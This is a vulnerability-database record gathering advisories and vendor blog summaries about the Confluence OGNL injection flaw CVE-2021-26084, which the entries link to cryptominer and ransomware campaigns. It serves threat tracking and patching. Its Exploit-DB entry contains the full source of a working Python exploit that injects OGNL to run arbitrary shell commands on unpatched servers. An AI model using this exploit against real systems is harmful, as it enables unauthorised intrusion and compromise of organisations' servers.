"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-10T18:32:40", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-26804"], "modified": "2021-09-10T18:32:40", "id": "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "href": "https://blog.rapid7.com/2021/09/10/metasploit-wrap-up-129/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection--cve-2021-26084---how-a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection-cve-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2021-09-21T16:35:19", "description": "Recently, we discovered that the cryptomining trojan z0Miner has been taking advantage of the Atlassian\u2019s Confluence remote code execution (RCE) vulnerability assigned as CVE-2021-26084, which was disclosed by Atlassian in August.", "cvss3": {}, "published": "2021-09-21T00:00:00", "type": "trendmicroblog", "title": "Cryptominer z0Miner Uses Newly Discovered Vulnerability CVE-2021-26084 to Its Advantage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-21T00:00:00", "id": "TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "href": "https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T18:37:14", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-18T14:36:36", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "atlassian": [{"lastseen": "2022-02-09T06:10:34", "description": "*This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.5\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-08T22:26:32", "id": "CONFSERVER-67940", "href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:44:44", "description": "*This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.5\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-22T01:29:22", "id": "ATLASSIAN:CONFSERVER-67940", "href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:35:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "exploitdb", "title": "Confluence Server 7.12.4 - &#039;OGNL injection&#039; Remote Code Execution (RCE) (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26084", "CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "EDB-ID:50243", "href": "https://www.exploit-db.com/exploits/50243", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\r\n# Date: 01/09/2021\r\n# Exploit Author: h3v0x\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: All < 7.12.x versions before 7.12.5\r\n# Tested on: Linux Distros \r\n# CVE : CVE-2021-26084\r\n\r\n#!/usr/bin/python3\r\n\r\n# References: \r\n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\r\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport optparse\r\n\r\nparser = optparse.OptionParser()\r\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\r\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\r\n\r\noptions, args = parser.parse_args()\r\nsession = requests.Session()\r\n\r\nurl_vuln = options.url\r\nendpoint = options.path\r\n\r\nif not options.url or not options.path:\r\n\r\n print('[+] Specify an url target')\r\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\r\n print('[+] Example help usage: exploit.py -h')\r\n exit()\r\n\r\n\r\ndef banner():\r\n\r\n print('---------------------------------------------------------------')\r\n print('[-] Confluence Server Webwork OGNL injection')\r\n print('[-] CVE-2021-26084')\r\n print('[-] https://github.com/h3v0x')\r\n print('--------------------------------------------------------------- \\n')\r\n\r\n\r\ndef cmdExec():\r\n\r\n while True:\r\n cmd = input('> ')\r\n xpl_url = url_vuln + endpoint\r\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\r\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\r\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\r\n\r\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\r\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\r\n print(queryStringValue)\r\n\r\n\r\nbanner()\r\ncmdExec()", "sourceHref": "https://www.exploit-db.com/download/50243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-12-14T15:20:51", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/Cerber-targeting-organizations-with-publicly_TA202158.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FMicrosoft-could-not-patch-this-vulnerability_TA202150-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nCerber, ransomware that mysteriously vanished in 2019, has reappeared with a new encryption. The new cerber includes fresh source code and makes use of the new library Crypto+++, whereas the previous form made use of Windows CryptoAPI libraries.\n\nCerber is utilizing the following two vulnerabilities: -CVE-2021-26084: a remote code execution vulnerability that allows an attacker to execute arbitrary code in Atlassian Confluence Servers and Datacenters versions 6.13.22, 6.14.0-7.4.10, 7.5.0-7.11.5, 7.12.0-7.12.4. It has been fixed in versions 6.13.23, 7.4.11, 7.11.6, and 7.12.5. -CVE-2021-22205: GitHub Gitlab community and enterprise versions 11.9.0-13.8 are affected by a command execution vulnerability that can be exploited by uploading an image that runs via the ExifTool of GitLab Workhorse and achieving remote code execution via a specially designed file. It has been fixed in version 13.9.\n\nThe new Cerber ransomware uses either of the two vulnerabilities mentioned above and then enters victims&#x27; systems and encrypts their files. Cerber ransomware places the ransom note in the file **__$$RECOVERY_README$$__.html**, and all the encrypted files have an extension of .locked.\n\nOrganizations can patch both vulnerabilities by upgrading their systems to fixed versions.\n\nThe TTP&#x27;s used by **Cerber** includes:\n\nTA0002 - Execution\n\nT1059 - Command and Scripting Interpreter\n\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\n\nTA0007 - Discovery\n\nT1012 - Query Registry\n\nT1082 - System Information Discovery\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise(IoCs)\n\n\n\n#### Patch Links\n\n<https://jira.atlassian.com/browse/CONFSERVER-67940>\n\n#### References\n\n<https://gitlab.com/gitlab-org/gitlab/-/issues/327121>\n\n<https://packetstormsecurity.com/files/164768/GitLab-Unauthenticated-Remote-ExifTool-Command-Injection.html>\n\n<https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html>\n\n<https://otx.alienvault.com/pulse/61af78ee529faac40b2de15e/related>\n\n<https://app.any.run/tasks/c59f562e-4a61-459c-b0a3-9890c412b0ea/>\n\n<https://www.bleepingcomputer.com/news/security/new-cerber-ransomware-targets-confluence-and-gitlab-servers/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T13:50:15", "type": "hivepro", "title": "Cerber targeting organizations with publicly available exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205", "CVE-2021-26084"], "modified": "2021-12-14T13:50:15", "id": "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "href": "https://www.hivepro.com/cerber-targeting-organizations-with-publicly-available-exploits/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity &amp; Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity &amp; Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malic